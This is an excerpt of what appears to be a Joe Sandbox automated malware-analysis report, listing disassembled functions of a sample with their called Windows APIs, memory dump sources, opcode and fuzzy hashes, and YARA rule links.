                                                                                                                                                                                                                                                            • String ID: KERNEL32.DLL$pI
                                                                                                                                                                                                                                                            • API String ID: 637971194-197072765
                                                                                                                                                                                                                                                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                                                                                                                                            Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove$_malloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1938898002-0
                                                                                                                                                                                                                                                            • Opcode ID: 801a918c30330fd5c8bc010afa06043b95e27693fe4c670c4d8cfbf639dcf655
                                                                                                                                                                                                                                                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 801a918c30330fd5c8bc010afa06043b95e27693fe4c670c4d8cfbf639dcf655
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                                                                                                                                            Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                                                                                                                                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                                                                                                                                                                                                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                                                                                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3771399671-0
                                                                                                                                                                                                                                                            • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                                                                                                                                                            • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                                                                                                                                                                                            Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 0044B555
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 0044B578
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2737351978-0
                                                                                                                                                                                                                                                            • Opcode ID: 0c541d96d6d6ada21947550f918e4a5920fd6bf4dd483e11ebc527f87b3cbbe1
                                                                                                                                                                                                                                                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c541d96d6d6ada21947550f918e4a5920fd6bf4dd483e11ebc527f87b3cbbe1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                                                                                                                                            Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00415253
                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0041529E
                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                                                                                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3638380555-0
                                                                                                                                                                                                                                                            • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                                                                                                                                                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                                                                                                                                                            Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                                                                                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                                                                                                                                            • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 004656CA
                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2945290962-0
                                                                                                                                                                                                                                                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                                                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                                                                                                                                            Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1457242333-0
                                                                                                                                                                                                                                                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                                                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                                                                                                                                            Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15295421-0
                                                                                                                                                                                                                                                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                                                                                                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                                                                                                                                            Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                            • API String ID: 780548581-3081909835
                                                                                                                                                                                                                                                            • Opcode ID: 5378e8049ee2a95257be1467db38ea41a0f606468867fb51d90dd075906198f3
                                                                                                                                                                                                                                                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5378e8049ee2a95257be1467db38ea41a0f606468867fb51d90dd075906198f3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                                                                                                                                                            Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                                                                                                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                                                                                                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                                                                                                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4082120231-0
                                                                                                                                                                                                                                                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                                                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                                                                                                                                            Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
